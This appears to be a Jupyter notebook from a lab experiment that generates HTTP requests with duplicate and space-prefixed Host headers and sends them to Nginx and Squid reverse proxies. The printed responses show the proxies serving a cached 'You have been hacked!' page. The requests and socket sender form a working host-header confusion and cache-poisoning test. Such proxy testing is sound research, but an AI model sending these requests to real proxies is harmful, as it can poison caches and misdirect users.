In [1]:
import generator

In [2]:
generator = generator.Generator()

grammar_conf = 'grammar.conf'       #HTTP Request的Grammar配置文件
rule_conf = 'rule_pre_and_succeeded_space.conf'             #HTTP Request的Rule配置文件

In [3]:
#分别解析Grammar文件和Rule文件
generator.conf_parse(grammar_conf)
generator.conf_parse(rule_conf)h

In [4]:
#得到所有可能的HTTP Request的字符串表示
requests = generator.get_request()

In [5]:
print('total number of requests:',len(requests))
print ('****************************************\n')
for req in requests:
    print (req)

total number of requests: 12
****************************************

GET / HTTP/1.1
Connection:keep-alive
 Host:www.benigh.com
Host: www.attack.com


GET / HTTP/1.1
Connection:keep-alive
Host: www.benigh.com
 Host:www.attack.com


GET / HTTP/1.1
Connection:keep-alive
 Host:www.attack.com
Host: www.benigh.com


GET / HTTP/1.1
Connection:keep-alive
Host: www.attack.com
 Host:www.benigh.com


GET http://www.benigh.com/ HTTP/1.1
Connection:keep-alive
 Host:www.benigh.com
Host: www.attack.com


GET http://www.benigh.com/ HTTP/1.1
Connection:keep-alive
Host: www.benigh.com
 Host:www.attack.com


GET http://www.benigh.com/ HTTP/1.1
Connection:keep-alive
 Host:www.attack.com
Host: www.benigh.com


GET http://www.benigh.com/ HTTP/1.1
Connection:keep-alive
Host: www.attack.com
 Host:www.benigh.com


GET http://www.attack.com/ HTTP/1.1
Connection:keep-alive
 Host:www.benigh.com
Host: www.attack.com


GET http://www.attack.com/ HTTP/1.1
Connection:keep-alive
Host: www.benigh.com
 Host:www.attack

In [6]:
import socket

In [7]:
#反向代理Squid和Nginx所在的地址
reverse_proxy = '192.168.8.162'
#Squid所监听的port
squid_port = 8000
#Nginx所监听的port
nginx_port = 80

In [8]:
def get_response(requests,target_host,target_port):
    '''
    返回HTTP Response列表
    requests是一个HTTP请求的列表
    逐一从requests中取出Request,并发送给target_host:target_port
    得到的resonse逐一添加到一个列表中并返回
    '''
    response_lst = []
    #建立一个socket对象
    client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    #客户端链接服务器端
    client.connect((target_host,target_port))
    
    for request in requests:
        #把str类型的request转成bytes类型
        request = bytes(request,encoding='utf-8')
        #发送数据
        client.send(request)
        #接收服务器返回的resonse,此时response是bypes类型
        response = client.recv(4096)
        #将bytes类型转成str
        response = bytes.decode(response)
        response_lst.append(response)
    return response_lst

In [12]:
nginx_response_lst = get_response(requests,reverse_proxy,nginx_port)
squid_response_lst = get_response(requests,reverse_proxy,squid_port)

In [13]:
#nginx_response_lst
print (len(nginx_response_lst))
for response in nginx_response_lst:
    if response != '' or response:
        print (response)
    else:
        print('空\n')

12
HTTP/1.1 200 OK
Server: nginx/1.13.6
Date: Thu, 07 Dec 2017 20:11:25 GMT
Content-Type: text/html
Content-Length: 324
Connection: keep-alive
Last-Modified: Tue, 05 Dec 2017 06:05:35 GMT
ETag: "5a26372f-144"
X-Via: 192.168.8.162
X-Cache: HIT
Accept-Ranges: bytes

<!DOCTYPE html>
<html>
<head>
<title>Attack!</title>
<style>
    body {
        width: 35em;
        margin: 0 auto;
        font-family: Tahoma, Verdana, Arial, sans-serif;
    }
</style>
</head>
<body>
<h1>This is www.attack.com!</h1>
<h1>You have been hacked!</h1>


<p><em>You have been hacked!</em></p>
</body>
</html>

HTTP/1.1 200 OK
Server: nginx/1.13.6
Date: Thu, 07 Dec 2017 20:11:25 GMT
Content-Type: text/html
Content-Length: 315
Connection: keep-alive
Last-Modified: Tue, 05 Dec 2017 06:33:03 GMT
ETag: "5a263d9f-13b"
X-Via: 192.168.8.162
X-Cache: HIT
Accept-Ranges: bytes


<!DOCTYPE html>
<html>
<head>
<title>Benigh!</title>
<style>
    body {
        width: 35em;
        margin: 0 auto;
        font-family: Tahoma, V

In [14]:
print(len(squid_response_lst)) 
for response in squid_response_lst:
    if response:
        print (response)
    else:
        print('空\n')

12
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 315
Last-Modified: Tue, 05 Dec 2017 06:33:03 GMT
Accept-Ranges: bytes
Server: nginx/1.13.6
Date: Thu, 07 Dec 2017 19:51:20 GMT
ETag: "5a263d9f-13b"
Age: 1205
X-Cache: HIT from GQY_Squid_Proxy
Via: 1.1 GQY_Squid_Proxy (squid/3.5.12)
Connection: keep-alive

<!DOCTYPE html>
<html>
<head>
<title>Benigh!</title>
<style>
    body {
        width: 35em;
        margin: 0 auto;
        font-family: Tahoma, Verdana, Arial, sans-serif;
    }
</style>
</head>
<body>
<h1>Welcome to www.benigh.com!</h1>

<p><em>Thank you for logining in www.benigh.com!</em></p>
</body>
</html>

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 315
Last-Modified: Tue, 05 Dec 2017 06:33:03 GMT
Accept-Ranges: bytes
Server: nginx/1.13.6
Date: Thu, 07 Dec 2017 19:51:20 GMT
ETag: "5a263d9f-13b"
Age: 1205
X-Cache: HIT from GQY_Squid_Proxy
Via: 1.1 GQY_Squid_Proxy (squid/3.5.12)
Connection: keep-alive

<!DOCTYPE html>
<html>
<head>
<title>Benigh!</title>
<sty

In [19]:
#r = ['GET http://www.attack.com HTTP/1.1\r\nHost: www.benigh.com\r\nHost: www.attack.com\r\n\r\n']
r = ['GET http://www.attack.com HTTP/1.1\r\nHost: www.attack.com\r\n Host:www.benigh.com\r\n\r\n']
n_response_lst = get_response(r,reverse_proxy,nginx_port)
s_response_lst = get_response(r,reverse_proxy,squid_port)

In [20]:
for response in n_response_lst:
    print (response)

HTTP/1.1 200 OK
Server: nginx/1.13.6
Date: Thu, 07 Dec 2017 20:21:31 GMT
Content-Type: text/html
Content-Length: 324
Connection: keep-alive
Last-Modified: Tue, 05 Dec 2017 06:05:35 GMT
ETag: "5a26372f-144"
X-Via: 192.168.8.162
X-Cache: HIT
Accept-Ranges: bytes

<!DOCTYPE html>
<html>
<head>
<title>Attack!</title>
<style>
    body {
        width: 35em;
        margin: 0 auto;
        font-family: Tahoma, Verdana, Arial, sans-serif;
    }
</style>
</head>
<body>
<h1>This is www.attack.com!</h1>
<h1>You have been hacked!</h1>


<p><em>You have been hacked!</em></p>
</body>
</html>



In [21]:
for response in s_response_lst:
    print (response)

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 324
Last-Modified: Tue, 05 Dec 2017 06:05:35 GMT
Accept-Ranges: bytes
Server: nginx/1.13.6
Date: Thu, 07 Dec 2017 09:27:40 GMT
ETag: "5a26372f-144"
Age: 39231
X-Cache: HIT from GQY_Squid_Proxy
Via: 1.1 GQY_Squid_Proxy (squid/3.5.12)
Connection: keep-alive

<!DOCTYPE html>
<html>
<head>
<title>Attack!</title>
<style>
    body {
        width: 35em;
        margin: 0 auto;
        font-family: Tahoma, Verdana, Arial, sans-serif;
    }
</style>
</head>
<body>
<h1>This is www.attack.com!</h1>
<h1>You have been hacked!</h1>


<p><em>You have been hacked!</em></p>
</body>
</html>

